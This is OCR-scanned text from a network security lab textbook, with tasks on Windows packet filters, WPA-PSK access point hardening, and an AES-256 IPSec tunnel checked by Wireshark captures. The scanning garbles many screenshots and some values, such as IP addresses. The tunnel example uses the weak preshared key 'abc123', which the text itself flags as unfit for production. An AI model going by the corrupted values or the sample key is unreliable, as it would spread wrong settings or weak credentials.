Subnet mask: ]m

Prglocol |Tce
Source part:
Destination port: EE]

14. Click OK to close the Add IP Filter dialog box.

=

21X

In this packet filter, the subnet mask of 255.255.255.255 means any packet
whose destination is this one system. It identifies a single machine on the
network.

This packet filter will drop all packets from any IP address going to this
server and using TCP port 23, the port used by Telnet.

15. In the Inbound Filters dialog box, carefully read the filter actions. They can be

confusing at first.

Receive All Packets Except Those That Meet The Criteria Below allows all traffic
except the traffic type you need to block.

Drop All Packets Except Those That Meet The Criteria Below drops all traffic,
allowing only the undesired traffic that you’ve identified. In this case, this is the
opposite of what you want.
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Select Receive All Packets Except Those That Meet The Criteria Below.

These fikers contral which packets are forwarded or processed by this netwark.
Filter action:
¥ Receive al packets except those that meet the criteria below

" Drap all packets except those that mest the criteria below

Filters:

| Source Ad.. | Source Met... | Diestination Add... | Drestination Maskl Protocol ‘ Source Py
Any Ay 192,16 f 5 TCP Any
152168100 256.255.255.0 Any Ay Any

141 | i

Hew... | Edi... I Delete |
Cancel |

16. Click OK to close the Inbound Filters dialog box.
17. Click OK to close the Interface Properties dialog box.

ING delete these two packet filters when you have successfully completed

@:" These filters will disallow traffic that you may desire. You may want to
Task 6.6 to restore your system to its normal operating state.

Criteria for Completion

You have completed this task when you have implemented the two identified packet filters.

Task 6.7: Implementing 802.11
Wireless Security

Wireless networks are becoming more prevalent every day. They are inexpensive, easy to
set up, and easy to relocate. They can also be one of the most vulnerable forms of network
communications today.

In January 2006, during a wireless-security course being held in Washington, DC,
a survey of the local access points showed that approximately 30 percent of wireless
networks are nonsecured, with no user or access point (AP) authentication and no
encryption for the data being transmitted. Further, that survey showed that approximately
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15 percent of wireless APs remain with the default settings, including the default
administrative logon credentials.

Not only can an attacker connect to the network and read all data transmitted, but
he can also log on to the AP as the administrator and reconfigure the system to lock the
legitimate users out of their own networks.

Wireless network specifications were originally defined in IEEE’s 802.11 standard.
There is now a series of 802.11x standards, and various implementations of wireless
networks now occupy several more 802 standards. The original 802.11 standard contained
several security measures, including the following:

s The ability to disable the Service Set Identifier (SSID) broadcast
= MAC address filtering

= Wired Equivalent Privacy (WEP) authentication

= WEP data encryption

The AP administrator should immediately change the SSID to something nondescriptive,
change the administrative username (if possible) and password, and disable DHCP, if
possible.

Security in 802.11 was found to be seriously flawed in several areas. 802.11i was
developed to correct the shortcomings of security in 802.11. The WiFi Alliance also improved
security for wireless networks with WiFi Protected Access (WPA, WPA2) for home network
use, called Personal, and for business network use, called Enterprise. WPA uses an acceptable
encryption algorithm that is strong and easier on the devices performing the encryption.
WPA2 uses a significantly stronger encryption algorithm that is considered uncrackable, but
the performance of your devices may suffer with the heavy workload. If performance remains
acceptable, use the strongest security on your wireless networks—WPA2, if available.

Scenario

You are the administrator of a Microsoft Windows environment and must implement a
wireless network. Since you probably don’t have resources to implement a business-class
system on your home network, you will be implementing WPA-Personal, which uses a
Pre-Shared Key (PSK).

Scope of Task

Duration
This task should take 30 minutes.

Setup

You will need to configure WPA-Personal with a PSK on your wireless AP. Then you
will need to configure the same settings on your (compatible) wireless client device
(wireless network interface card).
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In the wireless networking arena, technology and manufacturers are leading the standards.
Unfortunately, many wireless devices are incompatible with many other wireless devices.

Prior to performing this task, you might want to check for current firmware updates and
driver updates for your wireless devices. Such updates may improve compatibility.

Caveat

Wireless networks are inherently vulnerable to attack. If you fail to complete securing
the wireless network, disable the AP’s radio or remove power from the device. Failure to
secure the wireless network could expose your systems and information.

Procedure

You will first configure the wireless AP with several security features. Then you will
configure the wireless client with a compatible configuration. You will then have the
wireless client authenticate and associate with the AP.

Equipment Used

For this task, you must have:

= Windows XP Professional system with Service Pack 2 installed.
= Administrator access on the XP Professional system.

= 802.11i-compliant wireless network interface card (NIC), the wireless client, including
802.11a, 802.11b, or 802.11g radio (compatible with the radio in the wireless AP).
For example, if your AP is 802.11b-compliant, your client NIC must also be 802.11b-
compliant. In addition, both the AP and the client NIC must be 802.11i-compliant to
support the advanced WPA security settings.

= 802.11i-compliant Wireless AP, including 802.11a, 802.11b, or 802.11g radio
(compatible with the radio in the wireless client NIC).

s Administrator access on Wireless AP.

In this task, we will be referring to dialog boxes, navigation, and procedures
TE for configuring the NetGear WGT624 Wireless Access Point.Your dialog
boxes, navigation, and procedures may be different. However, if the device

you are using is 802.11i-compliant, these same settings will be available on the
configuration settings of the AP. Follow the specific instructions for your AP.

It is assumed that your wireless AP is connected to your network via a
TE wired Ethernet connection. It is also assumed that the wired interface is
configured with a static IP address compatible with your wired network.

It is further assumed that the Channel and Country options have been
configured correctly.
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Details
Securing the Wireless Access Point
1. Log on to the Windows XP Professional system as the Administrator.

2. Launch Internet Explorer. In the address bar, type the IP address of the AP and press
the Enter key.

3.  You should be prompted for the administrative username and password for the AP.
Type in the correct administrative username and password for your AP.

Connect to 192.168.277.754

- O

ok
LB\
R
The server 192, 168,222,254 at WGT624 requires a username
and password.
Warning: This server is requesting that your username and

password be sent in an insecure manner (basic authentication
without a secure connection).

User name: € admin B
Password: | T

[¥]Remember my password

This default administrative username and password should be supplied in

A TE the manufacturer’s documentation for the AP device.
sl Notice that this username and password might be sent in clear text, which
ING could be “sniffed” by an attacker. You should only authenticate as the AP’s

Administrator over the wired LAN, and when connected into the network
by a switch near the network connection to the AP. If this is a new AP, you
will use the default username and password that should be referenced in
your device documentation. You should change this default information at
the first opportunity.

4. You should be presented with the web-based administrative interface for the AP. If this
is a new AP with the default username and password, locate the configuration area to
change the administrative username and password. Change it now.
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(= NETGEAR Routter - Windows Internet Explorer
@.\:; * & http//192. 168,222, 254/start.htm
W I@NEFGEAR Router

Block Services Set Password
Schedule

E-mail

0ld Passwaord

Router Status New Passward

Attached Devices Repeat New Password

Backup Settings

Set Password

Router Upgrade

Wireless Settings

Port Forwarding /
Port Triggering

WAN Setup

L# @ mtemet ® 100% -

5. Once you have secured the administrative account on the AP, locate the configuration
area to check for a firmware update. Perform the firmware update as necessary,
carefully following the instructions provided by the manufacturer of the AP.

NETGEAR

108 Mbps Wireless Firewall Router

Router Upgrade

Router Status

Attached Devices

Backup Settings Check for New Version from the Internet

Set Password

Check for New Version Upon Log-in
Router Upgrade

Wireless Settings Locate and Select the Upgrade File from your Hard Disk:
Port Forwardi
Port Triggering
WAN Setup

-_Up\oad -Cancel
LAN IP Setup
Dynamic DNS
Static Routes

Remote
Management
UPnP

Logout

& Internet E 100% v
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Each of these steps may require you to click Apply, or may require an AP

A TE

reboot. If so, apply the changes or reboot and log back into the AP as necessary.

6. In the AP configuration console, locate the configuration area to change the SSID.

Change the SSID to something nondescriptive and generally disinteresting. The SSID in

the graphic has been changed to WAP.

You will need to know this SSID information later.

7. In the AP configuration console, locate the configuration area to disable the SSID
broadcasts (they may be called announcements, beacons, or something similar). Select

1

08 Mbps Wireless Firewall Router

Setup Wizard Wireless Settings

Basic Settings Wireless Network

Wireless Settings Name (SSID)
Region:
Logs Channel:

Block Sites Mode:

WAP

United States

01[v]

gandb

[yl

[

B

the option to disable the SSID broadcasts. In the example shown below, you would
clear the Enable SSID Broadcast option, as shown.

Router Status
Attached Devices
Backup Settings
Set Password

Router Upgrade

Wireless Settings
Port Forwarding /
Port Triggering
WAN Setup

LAN IP Setup
Dynamic DNS
Static Routes

Remote
Management

UPnP

Logout

NETGEAR ‘=t

108 Mbps Wireless Firewall Router

Advanced Wireless Settings

Wireless Router Settings

Enable Wireless Router Radio

[J Enable SSID Broadcast

Fragmentation Threshold (256 - 2346). 2346
CTS/RTE Threshold (256 - 2346): 2346

Preamble Mode

Long Preamble M

108Mbps Settings

[ Disable Advanced 108Mbps Features
[ Enable Adaptive Radio(AR) Feature
[ Enable extended Range(XR) Feature

Wireless Card Access List Setup Access List

]

& Internet
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If you have a limited list of known, wireless client devices, you can configure
MAC address filtering. If you must support unknown devices (as in a lobby
or conference room), you should not implement MAC address filtering. Skip
steps 8-10.

Only the devices configured on the list will be able to associate with
the AP.

8. In the AP configuration console, locate the configuration area to enable MAC address
filtering. Select the option to enable MAC address filtering.

9. To add devices to the MAC address filtering list, enter the device name and MAC

address, and

2

Backup Settings
Set Password
Router Upgrade

Wireless Settings

Port Forwarding /
Port Triggering

WAN Setup

LAN IP Setup
Dynamic DNS
Static Routes

Remote
Management

UPnP

Logout

NETGEAR

i 1108 @
- B iy Mbps
108 Mbps Wireless Firewall Router “aan

click Add.

The Media Access Control (MAC) address is made up of 12 hexadecimal
(0-9 and A-F) characters. It may need to be entered without any spaces, or
with one blank space between pairs, with dashes between pairs, or with

a colon between pairs, depending on the manufacturer. An example of a
MAC address is 00-1E-68-48-82-CD.

Wireless Card Access Setup

Available Wireless Cards
Device Name MAC Address

Wireless Card Entry
Device Name: ZAP

MAC Address: 0014a54ebb1a

&3 @ internet E 100% -
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10. Once you have completed the MAC Address Filter List, click Apply to implement
the filter.

11. In the AP configuration console, locate the area to configure security options.

108 Mbps Wireless Firewall Router Ta0an

~ -~ ~
Setup Wizard Wireless Settings Ml
Basic Settings Wireless Network
Wireless Settings Name (SSID) WAP

_|| Region United States M
Logs 1 Channel 01 M
Block Sites Made: gandb [~]
Block Services 3
Schedule Security Options 1
E-mail O Disable

O wWEP (Wired Equivalent Privacy)

Router Status @ WPA-PSK (Wi-Fi Protected Access Pre-Shared Key)

Attached Devices
Security Encryption (WPA-PSK)

e

Backup Settings

Set Password Passphrase: (8-03 characters)
Router U, d
[v] i v

@ Internet & 100% -

12. Select the configuration for WPA-Personal (this may be called something like
WPA-PSK, WPA-SOHO, or WPA-Home).

13. Enter a passphrase. This is a strong password and should contain at least 8 characters
(20 is considered strong for a passphrase), and should contain a mix of uppercase,
lowercase, numeric, and symbol characters.

You will need to know this passphrase information later.
TE

14. Apply your changes, as required by your AP, and log off the AP administrative
console.
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How to Find the MAC Address

The MAC address may be referred to as the physical, MAC, hardware, burned-in, or
Ethernet address. The MAC address is often printed on wireless devices. It can also be
obtained (once the device is installed on an XP Pro system) by executing the command
IPCONFIG/ALL at a command prompt:

D:\AA>IPCONFIG /ALL

Ethernet adapter INTERNAL ABG WIRELESS:
Description . . . : Broadcom 802.11la/b/g WLAN
Physical Address. . : 00-14-A5-4E-B6-1A

Ethernet adapter LAN:
Description: Realtek RTL8139/810x
Family Fast Ethernet NIC
Physical Address. . : 00-OF-BO-F8-7A-AE

Configuring the Wireless Client
1.  While logged into your XP Professional system, select Start » Settings » Control

Panel » Network Connections. Right-click on your installed wireless NIC and select

View Available Wireless Networks.

If you receive a message regarding the Wireless Zero Configuration (WZC)
TE service, you may need to configure and start the WZC service. Right-click

on My Computer and select Manage. Expand Services And Applications,

then select Services. Locate the Wireless Zero Configuration service.
Configure it for automatic startup and start the service.

Some wireless client device manufacturers implement driver sets that
TE conflict with Microsoft WZC. If this is the case with your device, again,

the dialog boxes, navigation, and procedure to configure WPA-PSK may

be different, but the settings should all be available and the configuration

settings should be the same on your third-party device configuration
dialog boxes.
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2. In the Choose A Wireless Network dialog box, in the left pane, select Change
Advanced Settings.

3. On the Wireless Networks tab, add a preferred network.

Bd

= INTERNAL ABG WL Properties ™

General | Wirclzss Networks |Ad\rar|ced

Use Windows to configure my wireless network settings

Available networks:

To connect to, disconnect from, or find out more information
about wireless networks in range, click the button below

View Wirslzss Networks
Prefemred networks:

Automatically connect to available networkes in the order listed
below:

Leam about getting up wirsless network
configuration.

4. On the Association tab, do the following:
= Enter the SSID: WAP.

% The SSID is case sensitive. Type it in exactly as you did on the AP.
TE

s Select WPA-PSK from the Network Authentication drop-down list.
s Select TKIP from the Data Encryption drop-down list.

= Enter the passphrase you selected while configuring the AP in the Network Key
field, and enter it again in the Confirm Network Key field.

WPA-PSK may be called WPA-Personal, WPA-SoHo, or WPA-Home on
TE your device.

% The passphrase is case sensitive. Type it in exactly as you did on the AP.
TE
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less network properties

Association | Authentication | Connection |

Netwark name {S51D): |WAP |

Wirsless network key

This network requires a key for the following:

Netwark Authentication: WPAPSK
Data encryption TKIP '
Network key |.......... |
Confirm networlk key: |uuuuu

Key index [advanced] Iil

[[] This is & computer4o-computer (ad hoc) network ; wirsless
access points are not used

On the Connections tab, confirm that the Connect When This Network Is In Range
option is enabled. Click OK to close the Wireless Network Properties dialog box.

less network properties

Association || Authertication ‘ Connection

Automatic connection

Whenever this network is detected, Windows can connect
to it automatically.

Connect when this network is in range

On the Wireless Networks tab, click Advanced.

On the Advanced tab, select Access Point (Infrastructure) Networks Only, and ensure

the Automatically Connect To Non-preferred Networks option is deselected. Click
Close to close the Advanced dialog box.

333
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f Advanced

Networks to access
() Any available network (access poirt prefered)
(%) Access point {nfrastructure) networks only

() Computerta-computer (ad hoc) networks onfy

[[] Automatically connect to non-prefemed networks

Close

8. Click OK to close the Interface Properties dialog box.

9. You should see a notice that you are now connected to WAP.

7] INTERNAL ABG WL is now connected %

Connected to: WAP
Signal Strength: Excellent

10. If you are not connected, in the Control Panel select Network Connections. Right-click
on your installed wireless NIC and select View Available Wireless Networks.

11. Select WAP and then click the Connect button at the bottom of the dialog box. The
following graphic shows the connected state.

WITINTERNAL ABG WL Z
—— Choose a wireless network
=, Refresh network list Click an item in the list below to connect to a wireless network in range or to get more
information,
<2 Setup a wireless network (@) WAP Connected * liad
for a home or small office i
"_L) Security-enabled wireless network (WPA) l“!!
Related Tasks ((i)) finksy
y Learn about wireless Unszecured wireless netwark l[l['ﬂﬂ
networking (( )) default
g:? Change the order of i u =
preferred networks Unsecured wireless network lu[lu
@ Change advanced (( )) L=uly
settings
Unsecured wireless network I.[luu
((i)) NETGEAR
'“;) Security-enabled wireless network I.[luu |
(( )) WEST7289
i £ i [luu
't Security-enabled wireless network ol M
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12. The true test is when you disable your wired interface and can browse the network
using the wireless interface only.

Notice in the previous graphic that only half of the APs are secured, and
TE one-third are set to their default settings.

Network connectivity requires that the wireless NIC is correctly configured
TE to connect to the AP, and the AP is correctly configured to connect to the

network.

Criteria for Completion

You have completed this task when you have successfully connected to your AP using
WPA-PSK.

Task 6.8: Implementing an IPSec
VPN Using AES

First introduced in Microsoft Windows Vista and in Microsoft Windows Server 2008 is the
Windows Firewall with Advanced Security. This implementation of the Windows personal
firewall introduced a significant improvement in the IPSec VPN. Earlier versions of Windows
that implemented IPSec (Windows 2000 through Windows XP) used triple Data Encryption
Standard (3DES) as its strongest encryption. Windows Vista, Windows 7 and Server 2008
use the newer, stronger Advanced Encryption Standard (AES), with three different key
lengths to choose from. AES is currently considered “uncrackable.”

If you're interested in the nitty-gritty of how AES works, see “Keep Your
TE Data Secure with the New Advanced Encryption Standard,” at http://

msdn.microsoft.com/msdnmag/issues/03/11/AES/.

Scenario

You are the administrator of a Microsoft Windows environment and must secure sensitive,
point-to-point communications between a computer in the Research and Development
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department and the high-security server that remains strongly protected inside the
corporate data center.

Further, you must validate that the communications are truly secured using the strongest
encryption by performing a sniffer trace to prove the encryption of frames between the two
computers.

Scope of Task

Duration
This task should take 60 minutes.

Setup

You will first test connectivity between the two computers and show that, currently, data
flow over this channel is unencrypted. Then you will need to configure the Windows
Firewall with Advanced Security on the source and destination computers. You will
configure a point-to-point [IPSec VPN Connection Security Rule to utilize AES-256. Finally
you will verify that the channel is now fully encrypted by performing a network analyzer
(sniffer) trace.

Caveat

Utilizing stronger encryption algorithms places a larger load on the CPU of the two
computer systems involved in the VPN. All outbound frames must be encrypted, and all
inbound frames must be decrypted. System performance will degrade while this channel
is active.

The VPN encrypts only data while in transit. It does not secure data while in storage
(also called “data at rest”). If you need to secure sensitive data at rest, you must implement
an additional encryption component in the security scheme of the system.

Procedure

You will test connectivity between source and destination computers by copying an ASCII
text file from one computer to the other. In this task, you will see Windows Vista as the
source computer and Windows Server 2008 as the destination computer. Further, you will
record this file transfer by running a sniffer on the source computer. This will show the
plain-text contents of the copied file. You may need to download and install a sniffer from
the Internet. Instructions will be provided for this.

Next you will configure the IPSec VPN in Transport mode (end-to-end) using the
Windows Firewall with Advanced Security on the source and destination computers. As
part of this configuration, you will review the strengths of the cryptographic standards that
are available, and select the strongest cipher available, AES-256.

Finally, you will copy the same file from one computer to the other while running the
sniffer trace to verify the effectiveness of the VPN tunnel.
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Equipment Used

For this task, you must have:

Two computer systems, one with Windows Vista and one with Windows Server 2008
installed

Administrator access on both systems
Network analyzer software installed on one of the systems

Internet connectivity

Details
Download and Install the Wireshark Sniffer on the Source Computer

1.

2
3.
4

Power up both computers. They must be able to connect to each other.
Log on to the source computer, in this case the Windows Vista system, as the Administrator.
Launch Internet Explorer.

Enter the following URL into the address bar:
http://www.wireshark.org/download.html

Download the appropriate and latest version of Wireshark for your source computer.

Install Wireshark on the source computer following the instructions provided by the
software provider.

Create a Share on the Destination Computer

1.

o w DN

Log on to the destination computer, in this case the Windows Server 2008 system, as
the Administrator.

Launch Windows Explorer (not Internet Explorer).

Create a new folder on the C:\ drive named AA.

Right-click the new AA folder and select Properties.

Select the Sharing tab. Click the Advanced Sharing button.
'I AAL Properties 4 x|

"General  Sharing | SEDquyl Previous Vers\unsl Cuslumlzel

~ Metwark, File and Folder Sharing

\L) Mot Shared

Metwork Path:
Mot Shared

Share...

[ Advanced Sharing

Set custom permissions, create multiple shares, and set other
advanced sharing options

@ Adwvanced Sharing.

Close I Cance! Apply
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6. Enable the Share This Folder check box.

7. Click the Permissions button.

=

-

8. Click the Add button.

Full Cantrol
Change
Read

9. Click the Advanced button.
10. Click the Find Now button.
11. Select Authenticated Users from the list. Click the OK button twice.

12. Select Authenticated Users in the Group Or User Names list, and click the Change
check box under Allow in Permissions For Authenticated Users. The Read setting
should already be enabled by default.
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N Permissions for A& i x|
Share Permissions I

Group or user hames:

ﬁAuthent\cated Users
% Evenone

Add... Remove

Permissions for Authenticated

Users Allow Deny
Full Control O O
Change O
Read a

Learn sbout access control and permissions

Ok | Cancel | Applp |

13. Click OK twice. Then click Close to enable the shared folder with the proper
permissions.

Test Connectivity and View Captured Data

1. On the source computer, open a command window by clicking Start » Run and typing
CMD. Then click OK.

2. Test connectivity between the two computers by executing the ping command: ping
<IP Address of the Destination computer>.

You can identify the IP address of each computer by launching a command
TE window on each computer and typing the command ipconfig.

B8 Administrator: BoBo ROCKS DUDE!!

Hicrosoft Windows [Version 6.8.60011 =
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>ping 192.168.222.150

Pinging 192.168.222.150 with 32 bytes of data:

Reply from 192.168.222.150: bytes=32 time=lms TTL=128
Reply from 192.168.222.150: bytes=32 time<lms TTL=128
Reply from 192.168.222.150: bytes=32 time<lms TTL=128
Reply from 192.168.222.150: bytes=32 time<lms TTL=128

Ping statistics for 192.168.222.150:

Packets: Sent = &, Received = &, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:

Hinimum = Bms, Maximum = lms, Average = Oms

C:\>
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In this case, the source computer, which runs Windows Vista, has the
A TE IP address 192.168.222.20, and the destination computer, which runs

Windows Server 2008, has the IP address 192.168.222.150.

3.  On the source computer, connect to the shared folder on the destination computer by
clicking Start » Run, and typing \\<IP Address of the Destination Computer>\AA.

Then click OK. (In our example, the command is \\192.168.222.150\AA.)

0 Neworr s |6

File  Edit “iew Tools Help

i ‘ Organize ~ s v
Falders v | Mame Date modified Type
M Desktop -~ This folder is empty.
TopDog
1. Public
M zap
Q Metanrk
18 197.16%.222.150
aa

felle

netlogon
b sysval
@ Printers

Contral Panel

"8 Recycle Bin = = -

~

’ 0 iterns

0 iterns (Disk free space: 29.2 GB) 0 Internet

You may be prompted for the credentials of an authenticated user on the
TE destination computer to establish the connection.

4. On the source computer, open Notepad. Type something that you will recognize later.
Save the file as VPN_Test. txt to the desktop.

Notepad creates ASCII text files that are easy to read when captured by a
TE network analyzer.

5. Launch the Wireshark Network Analyzer. Arrange items on your desktop so that you
can see the Wireshark Network Analyzer, the new file VPN_Test. txt, and the AA
folder on the destination computer.
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In the Wireshark Network Analyzer application window, select Capture > Interfaces
from the menu.

¢« v TFL2IEE B FBED%|B

—— il Options Cilaft | ——

E\\ter:l @ st > Expression.. Clear Apply
@ stop Ctrl+E
B Restart

Capture Eilters..,

M Ready to load or capture | Mo Packets | Profile: Default

Adjacent to the interface that provides the connection to the destination computer,
click the Start button to begin the capture. In this case, it is the interface with the IP
address 192.168.222.20.

@ v s IR =513

Description P Packets Packets/s i

& Microsoft 0.0.0.0 I 0
& Microsoft 10.242.1.87 0 0
| ‘. ME Tunnel Interface Driver unknowr i} 0
i@ Realtek RTL8169B/81118 PCI-E Gigabit Ethernet NIC 192,168.222.20 50 0 i
‘. Whiweare Virtual Ethernet Adapter 192.168.40.1 0 0
& VMware Virtual Ethemet Adapter 192.16%.80.1 i} ]

Drag and Drop the VPN_Test. txt file into the AA folder that is shared on the
destination computer.

In the Wireshark Network Analyzer application window, select Capture » Stop from
the menu.

In the Wireshark Network Analyzer application window, review the captured frames.
Identify the frame that carried the ASCII data. This frame will be an SMB (Server
Message Block) or SMB2 protocol frame, and is often labeled “Write Request” in the
Info column. The readable data that you typed into the file earlier should be present in
the lower window.
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EEETETE WS S

Eile Edit Wiew Go Capture Analyze Statistics Help
Bueee PEXEE acvveT2/[EE aaal @2 %% 8
E\\ter:l ~  Expression.. Clear Apply
No. . Time Source Destination Protocol  Info i
B2 b.163205  102.168.222.150 152,168, 222,20 EIEH GETINTD Response
64 6.164756  192.168.222.150 102.168.222.20 SMB2 setInfo Response
66 6.166082  192.168.222.150 102.168.222.20 TCP micrasoft-ds » 50749 [ACK] Seq:BlSED
67 6.166540  192.168.222.150 102.168.222.20 SMB2 write Response
63 6.167871  192.168.222.150 162.168.222.20 SMB2 setInfo Response
-
4| = — - — - " > — > = | 3

@ Frame 65 (1753 bytes on wire, 1753 hytes captured)

Ethernet II, Src: QuantaCo_48:82:cd (00:1e:68:48:82:cd), DsT: wmware 0e:h2:29 (00:0C:29:0e:h2:29)
Internet Protocol, Src: 182.168.222.20 (192.168.222.20), Dst: 192.168.222.150 (192.168.222.150)
[ MetBIOS Session Service

[ SMB2 (Serwver Message Block Protocol wersion 23

< . ] r
0050 00 00 61 00 10 oo ff £ £f £F 00 00 00 00 00 00 T -
00a0 00 00 00 00 00 00 00 00 00 00 Od 0a Od 0a 44 61 ........ ...... Da

00bD 76 69 64 20 52 28 20 4d 69 6C 6C 65 72 0d Oa 53 vid R. M iller..s

00cO  4d 45 2c 20 4d 43 54 2c 20 4d 43 45 54 50 72 ef ME, MCT, MCITPro E
00cd0 2¢ 20 4d 43 93 45 3a 20 53 65 63 75 72 69 74 79 , MCSE:  Security

0020 2¢ 20 43 49 53 53 50 2¢ 0d 0a 43 57 4e 41 2c 20 , CISSP, .. ChWNA,

00Ff0 43 43 4e 41 2c 20 43 4e 45 2c 20 4¢ 50 54 2¢ 20 CCNA, TN E, LPT,
0100 45 43 53 41 2 20 43 45 48 2C 20 53 65 63 75 T2 ECSA, CE H, sSecur
0110 &9 74 758 2b 2c 20 65 74 63 85 od Qa 77 77 77 2e Ty, et C...www,
0120 4d 69 63 72 &f 4c 69 Ge &b 43 &F 72 70 2e 63 &f mMmicroLin kCorp.co
0130 &d O0d 0a 0d 0a 41 75 74 68 &F 72 3a 20 4d 43 49 m....AUt hor: MCI
0140 54 50 72 &f 20 37 30 2d 36 34 37 3a 20 57 59 de TPro 70- 647: win
0150 &4 &F 77 73 20 53 &5 72 76 &5 T2 20 32 30 30 38 dows Ser ver 2008
0160 20 45 6e 74 65 72 70 72 62 73 65 20 41 &4 &d &9 Enterpr ise admi
0170 6Ge 69 73 74 72 61 74 69 &f e 20 0d 0a 4d 53 50 nistrati on ..MspP
0180 72 65 73 73 09 09 49 53 42 4e 2d 31 30 3a 20 30 ress,.Is BMN-10: O k>

File: "Ci\Users\TopDog\AppData\LacalTem. . | Packets: 129 Displayed: 128 Marked: I Dropped: 0 Profile: Default

Notice frame 65 in the preceding graphic. This frame carried the ASCII text
TE data in the demonstrated file transfer from source computer to destination
computer.

11. Spend some time reviewing this capture. Much can be learned from analyzing captures
like this one. Notice all the SMB2 protocol frames. This task shows the inherent
insecurity of using unencrypted data communications.

12. Save your plain-text capture by selecting File » Save As from the Wireshark Network
Analyzer menu. Name the capture PlainText and save it to the desktop.

Configuring the IPSec VPN

1. On the source computer, click Start » Programs » Administrative Tools » Windows
Firewall With Advanced Security.

This procedure must be performed on both the source and destination
A TE computers. The only difference will be a reversal of the IP addresses when
configuring the destination computer.
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2. Right-click on Connection Security Rules in the left pane, and select New Rule.

Conmaction Secwriy

- o Bl Moow Rute

CRE : .
Filltes by Profile L T Falter by Sate »
Fites by State » o .
View » 3 Ralresh
Rafreih -
Expart List.

. - Helg - "

Ovspluys Melkg for the cusmest selecson.

3. In the resulting wizard, on the Rule Type screen, select the Tunnel option. Click Next.

(@ I (=)

Rule Type i

| Select the type of connection secuiity rle to create.

Stepe:
& Rule Type ‘what type of connection security iule would wou like to create?
@ Tunnel Endpaints
@ Authentication Method © lIsolation

. Riestiict connections based on authentication criteria, such as domain membership or
@ Profile

health status

@ Name (7) Authentication exemption

Do not authenticate connections from the specified computers.

©) Server-to-server
Authenticate connection between the specified computers.

@ Tunnel
Authenticate connections between gateway computers,

) Custom
Custorn ruls.

Mote: Connection security iiles specify how and when authentication occurs, but they do not
allow connections. To allow a connection, create an inbound or outbound rule.

Leamn more about ule types

< Back ]l et » I[ Cancel

4. Use the IP address of the source computer for the IPv4 address line referring to
Endpoint 1, and use the IP address of the destination computer for the IPv4 address

line referring to Endpoint 2.
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ﬂ New Connection &cﬂ_ lif

Tunnel Endpoints

Specify the endpaints for the [Psec tunnel defined by this rule.

Steps:

» Fule Type Connections from Endpaint 1 to Endpaint 2 will pass through the specified tunnel endpaints.
Tunnel endpoints are generally gateway servers.

<) o) el Which computers are in Endpoint 17

@ Authentication Method 192.168.222.20 Add...

@ Profile —

Edit..
o one )
| Femove |

What is the local tunnel [closest to in Endpoint 1)?

IPvd address:  182.168.222.20

IPvE address:

‘What iz the remote tunnel computer [closest to computers in Endpoint 2)7
|Pv4 address 192.168.222.150

IPvE address:

‘Which computers are in Endpoint 2?7
192.168.222.150 Add...

Edit
Remove

Learn more about tunnel endpoint:

< Back ” Mext » ][ Cancel ]

5. To populate the Which Computers Are In Endpoint 1? field, click the Add button and
enter the IP address of the source computer in the This IP Address Or Subnet field.

e (E]

Specify the [P addiesses to match:

@ This IP address or subnet:

192.168.222.20

Eramples: 192 168.0.12
192.168.1.0/24
2002:3d3b:1a31:4:208: 74(f: (639643
2002:3d3b:1431:4:208:74if:fe33.04112

(@) This IP address range:

Frarn: | |

Ta: | |

©) Predefined set of computers:

| Drefault gateway - |

Learn more shout specifying I addresses

6. To populate the Which Computers Are In Endpoint 2? field, click the Add button and
enter the IP address of the destination computer in the This IP Address Or Subnet field.

7. Click Next.



9.

Task 6.8: Implementing an IPSec VPN Using AES 345

To keep this task simple, you will use the Preshared Key to authenticate the endpoints
of the IPSec VPN tunnel to each other. Notice that this is not recommended for
production but is intended for initial setup and testing purposes. For production,

a Public Key Infrastructure (PKI) using X.509 digital certificates should be used

for strong, mutual authentication of the endpoints. Select Preshared Key (Not

Recommended) and enter the key abc123.

@ New Connection Security Rule Wiza =
Authentication Method
Specity how authentication is performed for connections that match this rule.
Steps:
@ FRule Type ‘what authentication methad would you like to use?
@ Tunnel Endpoints o =
() Computer certificate
- UlETEEER M Restrit communications o connections from computers that have a certfisate from this
@ FProfile certification authority (Ca).
@ Name CA name: [ | | Browse...
[ Accept health cetificates only
These certificates are issued by Metwork Access Protection health certificate
servers
@ Preshared Key [not ded)
Key: abc122
Preshared key authentication is less secure than other authentication methods.
Preshared keys are stored in plaintest.
©) Advanced
Specify custom first and second authentication settings. Customize..
Learn more about suthentication methods
<Back |[ Mewt> | [ Cancel

Click Next.

10. Apply the rule to all three firewall profiles by enabling the Domain, Private, and Public

check boxes. Click Next.

g New Connection Security Rule Wiza
Profile

Specity the profiles for which this e appliss

Steps:
@ Fule Type When does this rule apply?
@ Turnel Endpoints
@ Authentication Method Domain
@ Profle Applies when a computer is connected ta its corporate domain.
@ MName Private
Applies when a computer is connected to a private network location.
Public

Applies when a computer is connected to a public netwark, lacation.

Leam more about profiles

< Back ][ Nest > ][

Cancal
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11. Name the new Connection Security Rule IPSec VPN using AES-256. Enter a
description if desired. Click the Finish button.

Name

Specify the name and description of this ile.

Steps:
@ Rule Type
Tunnel Endpaints

Luthentication Method
Name:

Prafile IPSec VPN using AES-256
Mame

Description [optional)

< Back “ Firish I I Cancel

12. Double-click the new Connection Security Rule IPSec VPN Using AES-256 to view its

properties.
Windows Firewall with Adva
il Help
== =@ = BE
:‘gjjbuo"u::”;:jes [Mome  Endbled  Endpointl  Endpoint? | Authenticationmode | Au| Connection SecurityR..
Bl Connection Security Rules &FIPSec VPN using AES-256  Yes 192.168.22220 192.169.222150  Require inbound an..  Cul| S Mew Rule..
» B Manitoring T Filter by Profile 3
T Filter by State 3
Wiew 3
Refresh
= ExportList.
d rep
< . | m 3

13. Review the settings, then close the IPSec VPN Using AES-256 Connection Security
Rule properties.
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Configuring the IPSec VPN to Use AES-256

1. In the left pane, right-click Windows Firewall With Advanced Security and select
Properties.

File  Action View Help
s | 2E = H
] Wmldzws Fidr;w‘a\l wiith ——_— Actions
gut”buo"und”R::Es Epueitign Enabled  Endpointl  Endpoint? Authentication mode  Ay|| Connection Security R«
B Connection Security g 196 Yes 192.168.22220 192.169.222150  Require inbound an..  Cul| S Mew Rule..
» B Manitoring T Filter by Profile 3
i T Filter by State 3
Properties iews R
Help @ Refresh
= ExportList..,
H Hep
R —T— 2| S —, 3
QOpens the properties dialog box for the current selection.

2. Select the IPSec Settings tab and click the Customize button.

Windows Firewall with Advanced Security on Local Computer Pr.. (=]

| Domain Profile | Private Profile | Public Profile | IPsec Settings |

IPsec defaults
| Specily setfings used by IPsec to =
